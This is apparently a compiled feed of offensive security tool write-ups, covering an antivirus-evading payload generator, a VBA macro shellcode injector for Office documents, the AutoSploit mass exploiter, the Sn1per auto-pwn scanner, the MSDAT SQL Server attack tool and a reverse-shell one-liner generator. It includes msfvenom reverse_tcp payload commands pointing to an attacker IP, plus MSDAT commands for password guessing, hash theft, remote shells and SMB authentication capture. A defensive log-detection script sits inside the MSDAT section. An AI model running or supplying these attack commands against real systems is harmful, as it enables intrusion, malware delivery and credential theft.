Remote NTLM relaying through meterpreter on Windows port 445

The hijacking of port 445 to perform relay attacks or hash-capturing attacks has been a recurring topic for a while now. When you infect a target with meterpreter, how do you listen on port 445? A few weeks ago this topic resurfaced, in part due to Dirk-jan (@_dirkjan), who saw this question flying […]

Link: http://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/

ASWCrypter – An Bash&Python Script For Generating Payloads that Bypasses All Antivirus

A Bash & Python script for generating payloads that bypasses all antivirus so far [FUD]. PLEASE DON'T UPLOAD BACKDOOR TO WWW.VIRUSTOTAL.COM

Important
This version is just for test; in future I will update ASWCrypter to generate payloads for Linux, Mac and Windows. ;)

Legal Disclaimer:
The author does not hold any responsibility for the bad use of this tool; remember this is only for educational purpose.

Requirements
1- Metasploit Framework
2- Python

Getting Started
git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git
cd ASWCrypter
chmod +x setup.sh or chmod 777 setup.sh

Link: http://feedproxy.google.com/~r/PentestTools/~3/LBt2kOgRz1c/aswcrypter-bash-script-for-generating.html

wePWNise – Generates Architecture Independent VBA Code To Be Used In Office Documents Or Templates And Automates Bypassing Application Control And Exploit Mitigation Software

wePWNise is a proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind, targeting locked-down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit, Cobalt Strike) and it also accepts any custom payload in raw format.

Prerequisites
Python termcolor package. To install run: pip install termcolor

Command line arguments
To start using wePWNise, first take a look at the options it supports:

usage: wepwnise.py [-h] -i86 <x86_shellcode> -i64 <x64_shellcode> [--inject64] [--out <output_file>] [--msgbox] [--msg <window_message>]

optional arguments:
  -h, --help              show this help message and exit
  -i86 <x86_shellcode>    Input x86 raw shellcode
  -i64 <x64_shellcode>    Input x64 raw shellcode
  --inject64              Inject into 64 Bit. Set to False when delivering x86 payloads only. Default is True
  --out <output_file>     File to output the VBA macro to
  --msgbox                Present messagebox to prevent automated analysis. Default is True.
  --msg <window_message>  Custom message to present the victim if --msgbox is set to True

wePWNise requires both 32 and 64 bit raw payloads in order to be able to deliver the appropriate type when it lands on an unknown target. However, if only an x86 architecture is targeted, a dummy 64 bit payload must be provided to replace the missing code.

In order to defeat certain automated analysis configurations, a message box opens upon execution of the code. The text of the message box can be altered by defining its value in the --msg parameter. To disable this functionality set the --msgbox parameter to False.

Due to performance conditions that may be introduced as a result of long SRP/EMET policies, wePWNise reads two configuration files (binary-paths.txt and directory-paths.txt) that contain a list of executables and directories which are less likely to be monitored, to be checked first. By editing the contents of those files the user can define their own choices instead. If the files are empty, wePWNise will directly start reading the SRP/EMET policies as they are defined within the Registry and make its injection choice purely based on the retrieved information.

Usage examples
The following sections describe some basic usage examples of wePWNise.

Metasploit payloads
First generate the payloads for both x86 and x64 architectures in raw format and ensure that the Metasploit listeners are configured appropriately.

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw

Then point wePWNise to the generated payloads and direct the output to msf_wepwn.txt:

$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt

Cobalt Strike payloads
To generate a raw payload in Cobalt Strike, navigate to the following menu and from the Output dropdown select the Raw format. Repeat the process and enable the x64 checkbox to produce a 64-bit payload.

Attacks > Packages > Payload Generator

Enter the generated payloads into wePWNise to generate the VBA code.

$ wepwnise.py -i86 /payloads/cs86.raw -i64 /payloads/cs64.raw --msgbox False --out /payloads/cs_wepwn.txt

Custom payloads
In certain cases it may be that only an x86 payload is available. As wePWNise expects both 32-bit and 64-bit payloads, in order to disable 64-bit injection create a dummy 64-bit file and set the --inject64 parameter to False.

$ echo "+" > /payloads/dummy64.raw
$ wepwnise.py -i86 /payloads/custom.raw -i64 /payloads/dummy64.raw --inject64 False --out /payloads/wepwn86.txt

Similarly, to generate 64-bit payloads only, create a dummy x86 file and supply it in wePWNise's -i86 command line parameter.

Link: http://feedproxy.google.com/~r/PentestTools/~3/xnUJEXNmLbQ/wepwnise-generates-architecture.html

AutoSploit v2.2 – Automated Mass Exploiter

As the name might suggest, AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye, but options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started.

Operational Security Consideration
Receiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the required dependencies available.

The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.

Installation
Installing AutoSploit is very simple; you can find the latest stable release here. You can also download the master branch as a zip or tarball, or follow one of the methods below.

Cloning
sudo -s << EOF
git clone https://github.com/NullArray/Autosploit.git
cd AutoSploit
chmod +x install.sh
./install.sh
python2 autosploit.py
EOF

Docker
sudo -s << EOF
git clone https://github.com/NullArray/AutoSploit.git
cd AutoSploit
chmod +x install.sh
./install.sh
cd Docker
docker network create -d bridge haknet
docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres
docker build -t autosploit .
docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit
EOF

On any Linux system the following should work:
git clone https://github.com/NullArray/AutoSploit
cd AutoSploit
chmod +x install.sh
./install.sh

AutoSploit is compatible with macOS; however, you have to be inside a virtual environment for it to run successfully. To do this, do the following:
sudo -s << '_EOF'
pip2 install virtualenv --user
git clone https://github.com/NullArray/AutoSploit.git
virtualenv <PATH-TO-YOUR-ENV>
source <PATH-TO-YOUR-ENV>/bin/activate
cd <PATH-TO-AUTOSPLOIT>
pip2 install -r requirements.txt
chmod +x install.sh
./install.sh
python autosploit.py
_EOF

More information on running Docker can be found here.

Usage
Starting the program with python autosploit.py will open an AutoSploit terminal session. The options are as follows:
1. Usage And Legal
2. Gather Hosts
3. Custom Hosts
4. Add Single Host
5. View Gathered Hosts
6. Exploit Gathered Hosts
99. Quit

Choosing option 2 will prompt you for a platform-specific search query. Enter IIS or Apache, for example, and choose a search engine. After doing so the collected hosts will be saved to be used in the Exploit component.

As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type python autosploit.py -h to display all the options available to you. I've posted the options below as well for reference.

usage: python autosploit.py -[c|z|s|a] -[q] QUERY
                            [-C] WORKSPACE LHOST LPORT [-e] [--whitewash] PATH
                            [--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH
                            [--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT

optional arguments:
  -h, --help            show this help message and exit

search engines:
  possible search engines to use
  -c, --censys          use censys.io as the search engine to gather hosts
  -z, --zoomeye         use zoomeye.org as the search engine to gather hosts
  -s, --shodan          use shodan.io as the search engine to gather hosts
  -a, --all             search all available search engines to gather hosts

requests:
  arguments to edit your requests
  --proxy PROTO://IP:PORT                      run behind a proxy while performing the searches
  --random-agent                               use a random HTTP User-Agent header
  -P USER-AGENT, --personal-agent USER-AGENT   pass a personal User-Agent to use for HTTP requests
  -q QUERY, --query QUERY                      pass your search query

exploits:
  arguments to edit your exploits
  -E PATH, --exploit-file PATH                              provide a text file to convert into JSON and save for later use
  -C WORKSPACE LHOST LPORT, --config WORKSPACE LHOST LPORT  set the configuration for MSF (IE -C default 127.0.0.1 8080)
  -e, --exploit                                             start exploiting the already gathered hosts

misc arguments:
  arguments that don't fit anywhere else
  --ruby-exec           if you need to run the Ruby executable with MSF use this
  --msf-path MSF-PATH   pass the path to your framework if it is not in your ENV PATH
  --whitelist PATH      only exploit hosts listed in the whitelist file

Dependencies
Note: all dependencies should be installed using the above installation method; however, if you find they are not, AutoSploit depends on the following Python 2.7 modules:
requests
psutil

Should you find you do not have these installed, get them with pip like so:
pip install requests psutil
or
pip install -r requirements.txt

Since the program invokes functionality from the Metasploit Framework you need to have this installed also. Get it from Rapid7 by clicking here.

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZT_17-GzAcc/autosploit-v22-automated-mass-exploiter.html

UPDATED VERSION: RouterSploit 3.3.0

PenTestIT RSS Feed
Since my last update, this router exploitation framework has gone through a lot of updates. This post is about RouterSploit 3.3.0, code named I Know You Were Trouble. We will also discuss changes made in an earlier version, 3.2.0, to maintain a chain, with the hope that I keep a watch on these cool […]
The post UPDATED VERSION: RouterSploit 3.3.0 appeared first on PenTestIT.

Link: http://pentestit.com/updated-version-routersploit-3-3-0/

UPDATED VERSION: AutoSploit 2.2

It has been some days since there was a lot of hue and cry about AutoSploit, and eventually everything subsided. I wrote about it in a post titled AutoSploit = Shodan/Censys/Zoomeye + Metasploit too. Recently, an updated and improved version, AutoSploit 2.2, was released. This post will try to describe the changes between the […]
The post UPDATED VERSION: AutoSploit 2.2 appeared first on PenTestIT.

Link: http://feedproxy.google.com/~r/PenTestIT/~3/1YYxIzm27jk/

Sn1per v5.0 – Automated Pentest Recon Scanner

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.

SN1PER PROFESSIONAL FEATURES:
Professional reporting interface
Slideshow for all gathered screenshots
Searchable and sortable DNS, IP and open port database
Categorized host reports
Quick links to online recon tools and Google hacking queries
Personalized notes field for each host

SN1PER COMMUNITY FEATURES:
Automatically collects basic recon (ie. whois, ping, DNS, etc.)
Automatically launches Google hacking queries against a target domain
Automatically enumerates open ports via NMap port scanning
Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
Automatically checks for sub-domain hijacking
Automatically runs targeted NMap scripts against open ports
Automatically runs targeted Metasploit scan and exploit modules
Automatically scans all web applications for common vulnerabilities
Automatically brute forces ALL open services
Automatically tests for anonymous FTP access
Automatically runs WPScan, Arachni and Nikto for all web services
Automatically enumerates NFS shares
Automatically tests for anonymous LDAP access
Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities
Automatically enumerates SNMP community strings, services and users
Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067
Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers
Automatically tests for open X11 servers
Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
Performs high level enumeration of multiple hosts and subnets
Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
Automatically gathers screenshots of all web sites
Create individual workspaces to store all scan output

AUTO-PWN:
Drupal Drupalgeddon2 RCE CVE-2018-7600
GPON Router RCE CVE-2018-10561
Apache Struts 2 RCE CVE-2017-5638
Apache Struts 2 RCE CVE-2017-9805
Apache Jakarta RCE CVE-2017-5638
Shellshock GNU Bash RCE CVE-2014-6271
HeartBleed OpenSSL Detection CVE-2014-0160
Default Apache Tomcat Creds CVE-2009-3843
MS Windows SMB RCE MS08-067
Webmin File Disclosure CVE-2006-3392
Anonymous FTP Access
PHPMyAdmin Backdoor RCE
PHPMyAdmin Auth Bypass
JBoss Java De-Serialization RCEs

KALI LINUX INSTALL:
./install.sh

DOCKER INSTALL:
Credits: @menzow
Docker Install: https://github.com/menzow/sn1per-docker
Docker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/
Example usage:
$ docker pull menzo/sn1per-docker
$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io

USAGE:
[*] NORMAL MODE
sniper -t|--target <TARGET>
[*] NORMAL MODE + OSINT + RECON
sniper -t|--target <TARGET> -o|--osint -re|--recon
[*] STEALTH MODE + OSINT + RECON
sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon
[*] DISCOVER MODE
sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>
[*] SCAN ONLY SPECIFIC PORT
sniper -t|--target <TARGET> -m port -p|--port <portnum>
[*] FULLPORTONLY SCAN MODE
sniper -t|--target <TARGET> -fp|--fullportonly
[*] PORT SCAN MODE
sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>
[*] WEB MODE - PORT 80 + 443 ONLY!
sniper -t|--target <TARGET> -m|--mode web
[*] HTTP WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>
[*] HTTPS WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>
[*] ENABLE BRUTEFORCE
sniper -t|--target <TARGET> -b|--bruteforce
[*] AIRSTRIKE MODE
sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike
[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>
[*] ENABLE LOOT IMPORTING INTO METASPLOIT
sniper -t|--target <TARGET>
[*] LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimport
[*] UPDATE SNIPER
sniper -u|--update

MODES:
NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.
STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.
AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts/IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
FULLPORTONLY: Performs a full detailed port scan and saves results to XML.
WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.
WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.
UPDATE: Checks for updates and upgrades all components used by sniper.
REIMPORT: Reimport all workspace files into Metasploit and reproduce all reports.
RELOAD: Reload the master workspace report.

SAMPLE REPORT:
https://gist.github.com/1N3/8214ec2da2c91691bcbc

Link: http://feedproxy.google.com/~r/PentestTools/~3/Z_yHqaJ_y1U/sn1per-v50-automated-pentest-recon.html

Dumping Domain Password Hashes

It is very common during penetration tests where domain administrator access has been achieved to extract the password hashes of all the domain users for offline cracking and analysis. These hashes are stored in a database file in the domain controller (NTDS.DIT) with some additional information like group memberships and users. The NTDS.DIT file is […]

Link: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/

MSDAT – Microsoft SQL Database Attacking Tool

MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.

Usage examples of MSDAT:
You have a Microsoft database listening remotely and you want to find valid credentials in order to connect to the database
You have a valid Microsoft SQL account on a database and you want to escalate your privileges
You have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (xp_cmdshell)

Tested on Microsoft SQL database 2005, 2008 and 2012.

Changelog
Version 1.0 (2017/02/15): first version released

Features
Thanks to MSDAT (Microsoft SQL Database Attacking Tool), you can:
get technical information (ex: database version) of a MSSQL database without being authenticated
search MSSQL accounts with a dictionary attack
test each login as password (authentication required)
get a windows shell on the database server with xp_cmdshell
download files remotely with: OLE Automation, bulkinsert, openrowset
upload files on the server with: OLE Automation, openrowset
capture a SMB authentication thanks to: bulkinsert, openrowset, xp_dirtree, xp_fileexist, xp_getfiledetails
steal MSSQL hashed passwords, on any MSSQL version
scan ports through the database: openrowset
execute SQL requests on a remote MSSQL server through the database (target) with: bulkinsert, openrowset
list files/directories with: xp_subdirs, xp_dirtree
list drives/medias with: xp_fixeddrives, xp_availablemedia
create folder with: xp_create_subdir

Installation
Some dependencies must be installed in order to run MSDAT. In Ubuntu:
sudo apt-get install freetds-dev (or download freetds from http://www.freetds.org/)
sudo pip install cython colorlog termcolor pymssql argparse
sudo pip install argcomplete && sudo activate-global-python-argcomplete

Add "use ntlmv2 = yes" in your freetds configuration file (ex: /etc/freetds/freetds.conf or /usr/local/etc/freetds.conf). Example:
[global]
    # TDS protocol version
    tds version = 8.0
    use ntlmv2 = yes

Examples

Modules
You can list all modules:
./msdat.py -h
When you have chosen a module (example: all), you can use it and you can list all features and options of the module:
./msdat.py all -h
You can know if a specific module can be used on a MSSQL server thanks to the --test-module option. This option is implemented in each msdat module.

all module
The all module allows you to run all modules (depending on the options that you have purchased).
python msdat.py all -s $SERVER
If you want:
to use your own account file for the dictionary attack
to try multiple passwords for a user without asking you
to define your own timeout value
./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10 --force-retry
In each module, you can define the charset to use with the --charset option.

mssqlinfo module
To get technical information about a remote MSSQL server without being authenticated:
./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info
This module uses the TDS protocol and the SQL Browser service to get information.

passwordguesser module
This module allows you to search valid credentials:
./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --force-retry --search
The --force-retry option allows testing multiple passwords for each user without asking you.
You can specify your own account file with the --accounts-file option:
./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt --force-retry

passwordstealer module
To dump hashed passwords:
./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump --save-to-file test.txt
This module has been tested on SQL Server 2000, 2005, 2008 and 2014.

xpcmdshell module
To execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell
This previous command gives you an interactive shell on the remote database server.
If xp_cmdshell is not enabled, the --enable-xpcmdshell option can be used in this module to activate it:
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --enable-xpcmdshell --disable-xpcmdshell --shell
The --enable-xpcmdshell option enables xp_cmdshell if it is not enabled (it is not enabled by default).
The --disable-xpcmdshell option disables xp_cmdshell if it is enabled.

smbauthcapture module
Thanks to this module, you can capture a SMB authentication:
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name SHARE
To capture the SMB authentication, the auxiliary/server/capture/smb (http://www.rapid7.com/db/modules/auxiliary/server/capture/smb) module of metasploit could be used:
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit
The capture command of this module tries to capture a SMB authentication thanks to the xp_dirtree, xp_fileexist or xp_getfiledetails procedure.
If you want to choose the SMB authentication procedure to capture the authentication:
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-dirtree-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-fileexist-capture 127.0.0.1
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-getfiledetails-capture 127.0.0.1
You can change the SHARE name with the --share-name option.

oleautomation module
This module can be used to read/write files on the database server.
The following command reads the file temp.txt stored on the database server:
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'
To write a string in a file (temp.txt) remotely:
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --write-file 'C:\Users\Administrator\Desktop\temp.txt' 'a\nb\nc\nd\ne\nf'
This module can be used to download a file (C:\Users\Administrator\Desktop\temp.txt) stored on the database server:
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt
Also, you can use this module to upload a file (temp.txt) on the target:
./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --put-file temp.txt 'C:\Users\Administrator\Desktop\temp.txt'

bulkopen module
The module bulkopen can be used:
to read/download files stored on a database server
to scan ports through the database server
to execute SQL requests on a remote MSSQL server through the database
To read a file stored on the target, the following command can be used:
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'
The --method option can be used to specify the method to use: bulkinsert (https://msdn.microsoft.com/en-us/library/ms188365.aspx) or openrowset (https://msdn.microsoft.com/en-us/library/ms190312.aspx):
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt' --method openrowset
To download a file (C:\Users\Administrator\Desktop\temp.txt):
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt
This module can be used to scan ports (1433 and 1434 of 127.0.0.1) through the database server:
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433,1434 -v
You can scan a range of ports:
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433-1438
This module can be used to execute SQL requests (ex: select @@ServerName) on a remote database server (ex: $SERVER2) through the database ($SERVER):
./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD 'select @@ServerName'

xpdirectory module
The module xpdirectory can be used:
to list files, directories and drives
to check if a file exists
to create a directory
To list files in a specific directory:
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-files 'C:\'
To list directories in a specific directory:
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-dir 'C:\'
To list drives:
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-fixed-drives --list-available-media
To check if a file exists:
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --file-exists 'C:\' --file-exists 'file.txt'
To create a directory:
./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --create-dir 'C:\temp'

search module
The module search can be used to search a pattern in column names of tables and views. Useful to search the pattern %password% in column names, for example.
To get column names which contain password patterns (ex: passwd, password, motdepasse, clave):
./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns
If you want to see column names which don't contain any data, you should use the option --show-empty-columns.
To search a specific pattern in column names of views and tables:
./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns
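As an added example (not MSDAT's code), the following Python detection logic runs over constructed SQL Server statement-audit lines and flags the techniques the modules above rely on: enabling and calling xp_cmdshell, enabling OLE Automation, xp_dirtree/xp_fileexist/xp_getfiledetails given a UNC path, and BULK INSERT / OPENROWSET file reads. The log line format, the host, login and application names, and the trusted-application allowlist are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample of SQL Server statement-audit output (not real logs), one statement per line.
SAMPLE_LOG = r"""
2018-08-25T10:12:01Z host=DB01 login=reporting app=Tableau stmt=SELECT name FROM sys.databases
2018-08-25T10:12:03Z host=DB01 login=sa app=msdat stmt=EXEC sp_configure 'show advanced options', 1; RECONFIGURE
2018-08-25T10:12:04Z host=DB01 login=sa app=msdat stmt=EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE
2018-08-25T10:12:05Z host=DB01 login=sa app=msdat stmt=EXEC master..xp_cmdshell 'whoami'
2018-08-25T10:12:09Z host=DB01 login=webapp app=msdat stmt=EXEC master..xp_dirtree '\\192.0.2.10\SHARE', 1, 1
2018-08-25T10:12:12Z host=DB01 login=webapp app=msdat stmt=SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\Desktop\temp.txt', SINGLE_CLOB) AS f
2018-08-25T10:12:15Z host=DB01 login=etl app=SSIS stmt=BULK INSERT staging.orders FROM 'D:\feeds\orders.csv'
""".strip().splitlines()

# Assumed log line layout: timestamp, then key=value fields, the statement text last.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) login=(?P<login>\S+) app=(?P<app>\S+) stmt=(?P<stmt>.*)$")

# Detection rules, one per technique the MSDAT modules rely on: (name, pattern, meaning).
RULES: List[Tuple[str, "re.Pattern[str]", str]] = [
    ("xp_cmdshell_enabled", re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I),
     "xp_cmdshell switched on (what --enable-xpcmdshell does)"),
    ("ole_automation_enabled", re.compile(r"sp_configure\s+'Ole Automation Procedures'\s*,\s*1", re.I),
     "OLE Automation switched on (needed by the oleautomation module)"),
    ("xp_cmdshell_exec", re.compile(r"\bxp_cmdshell\s+N?'", re.I),
     "OS command executed through the database engine"),
    ("unc_path_xp", re.compile(r"\bxp_(dirtree|fileexist|getfiledetails)\s+N?'\\\\", re.I),
     "file/directory xp given a UNC path, so the server authenticates outbound over SMB (smbauthcapture)"),
    ("bulk_file_read", re.compile(r"\bBULK\s+INSERT\b|OPENROWSET\s*\(\s*BULK\b", re.I),
     "server-side file read via BULK INSERT / OPENROWSET(BULK) (bulkopen --read-file)"),
    ("adhoc_remote_query", re.compile(r"OPENROWSET\s*\(\s*'(SQLNCLI|SQLOLEDB|MSOLEDBSQL)", re.I),
     "ad hoc query to another server (bulkopen --scan-ports / --request-rdb)"),
]

# Applications that legitimately bulk-load files; their bulk_file_read hits are kept but downgraded.
TRUSTED_BULK_APPS = {"SSIS"}


@dataclass(frozen=True)
class Finding:
    ts: str
    login: str
    app: str
    rule: str
    severity: str
    stmt: str


def parse_line(line: str) -> Dict[str, str]:
    """Split one log line into its fields; malformed input is an error, not silently skipped."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparsable log line: {line!r}")
    return m.groupdict()


def analyze(lines: List[str]) -> List[Finding]:
    """Run every rule over every statement and return the matches in log order."""
    findings: List[Finding] = []
    for line in lines:
        rec = parse_line(line)
        for name, pattern, _meaning in RULES:
            if not pattern.search(rec["stmt"]):
                continue
            severity = "info" if name == "bulk_file_read" and rec["app"] in TRUSTED_BULK_APPS else "high"
            findings.append(Finding(rec["ts"], rec["login"], rec["app"], name, severity, rec["stmt"]))
    return findings


def enable_then_execute(findings: List[Finding]) -> List[str]:
    """Logins that enabled xp_cmdshell and afterwards ran a command through it (the xpcmdshell module's sequence)."""
    enabled: set = set()
    chained: List[str] = []
    for f in findings:  # analyze() returns findings in log order, so "afterwards" is positional
        if f.rule == "xp_cmdshell_enabled":
            enabled.add(f.login)
        elif f.rule == "xp_cmdshell_exec" and f.login in enabled and f.login not in chained:
            chained.append(f.login)
    return chained


def describe(rule_name: str) -> str:
    """Meaning text of a rule, for the report line."""
    return next(meaning for name, _pattern, meaning in RULES if name == rule_name)


if __name__ == "__main__":
    hits = analyze(SAMPLE_LOG)
    for f in hits:
        print(f"[{f.severity:4}] {f.ts} {f.login}@{f.app}: {f.rule}: {describe(f.rule)}")
    for login in enable_then_execute(hits):
        print(f"[CHAIN] {login} enabled xp_cmdshell and then executed a command through it")
```

The bulk-load rule is deliberately noisy; the allowlist shows where triage by calling application belongs, and the chain check turns two medium-confidence hits into one high-confidence sequence.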

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZIGtMzYR_7Q/msdat-microsoft-sql-database-attacking.html

One-Lin3r v1.1 – Gives You One-Liners That Aids In Penetration Testing Operations

One-Lin3r is a simple and light-weight framework inspired by the web-delivery module in Metasploit. It consists of various one-liners that aid in penetration testing operations:
Reverser: Give it IP & port and it returns a reverse shell liner ready for copy & paste.
Dropper: Give it an uploaded-backdoor URL and it returns a download-&-execute liner ready for copy & paste.
Other: Holds liners with the general purpose to help in penetration testing (ex: Mimikatz, Powerup, etc.) on the trending OSes (Windows, Linux, and macOS). More OSes can be added too.

Features
Search for any one-liner in the database by its full name or partially.
You can add your own liners by following these steps to create a ".liner" file. Also, you can send it to me directly and it will be added in the framework and credited with your name.
Autocomplete any framework command and recommendations in case of typos (in case you love hacking like movies).
Command line arguments can be used to give the framework a resource file to load and execute for automation.
The ability to reload the database if you added any liner without restarting the framework.
You can add any platform to the payloads database just by making a folder in the payloads folder and creating a ".liner" file there.
More...
The payloads database is not big now because this is the first edition, but it will get bigger with updates and contributions.

Usage

Command line arguments
usage: one-lin3r [-h] [-r R] [-x X] [-q]
optional arguments:
  -h, --help  show this help message and exit
  -r          Execute a resource file (history file).
  -x          Execute a specific command (use ; for multiples).
  -q          Quiet mode (no banner).

Framework commands
help/?          Show this help menu
list/show       List payloads you can use in the attack.
search          Search payloads for a specific one
use <payload>   Use an available payload
info <payload>  Get information about an available payload
banner          Display banner
reload/refresh  Reload the payloads database
check           Prints the core version and database version, then checks for them online.
history         Display the most important command line history from the beginning
save_history    Save command line history to a file
exit/quit       Exit the framework

Installing and requirements
To make the tool work at its best you must have:
Python 3.x or 2.x (preferred 3).
Linux (tested on Kali rolling), Windows system, or macOS (tested on 10.11).
The requirements mentioned in the next few lines.

Installing
For Windows (after downloading the ZIP and unzipping it):
python -m pip install ./One-Lin3r-master
one-lin3r -h
For Linux:
git clone https://github.com/D4Vinci/One-Lin3r.git
apt-get install libncurses5-dev
pip install ./One-Lin3r
